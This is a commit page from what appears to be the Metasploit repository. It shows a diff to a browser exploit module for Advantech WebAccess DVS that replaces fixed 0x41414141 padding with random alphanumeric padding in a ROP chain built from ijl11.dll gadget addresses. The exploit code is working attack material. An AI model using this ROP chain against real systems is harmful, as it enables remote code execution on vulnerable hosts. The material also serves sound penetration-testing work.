Skip to content

Commit 64ac1e6

Browse files
jvazquez-r7jvazquez-r7
committed
Rand padding
1 parent e593a4c commit 64ac1e6

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -100,10 +100,10 @@ def rop_payload(code)
100100
xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
101101
# EBX = dwSize (0x1000)
102102
xpl << [0x60018084].pack("V") # POP EBP # RETN
103-
xpl << [0x41414141].pack("V") # padding
104-
xpl << [0x41414141].pack("V") # padding
105-
xpl << [0x41414141].pack("V") # padding
106-
xpl << [0x41414141].pack("V") # padding
103+
xpl << rand_text_alphanumeric(4) # padding
104+
xpl << rand_text_alphanumeric(4) # padding
105+
xpl << rand_text_alphanumeric(4) # padding
106+
xpl << rand_text_alphanumeric(4) # padding
107107
xpl << [0x60029f6c].pack("V") # .data ijl11.dll
108108
xpl << [0x60012288].pack("V") # POP ECX # RETN
109109
xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)

0 commit comments

Comments
 (0)